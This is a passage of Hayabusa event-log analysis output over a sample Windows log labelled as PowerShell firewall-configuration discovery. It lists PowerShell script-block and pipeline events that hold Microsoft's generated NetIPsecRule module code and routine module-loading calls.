'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and 
(@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { 
[object]$__cmdletization_value = ${AddressType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DnsServers'; ParameterType = 
'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Sync-NetIPsecRule' function Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, 
[Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"(-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 
System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = ${IPv6Addresses} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = ${PassThru} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { 
$__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Update-NetIPsecRule'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 
+09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration 
enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Find-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network 
Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, 
[Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteTunnelHostname}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = 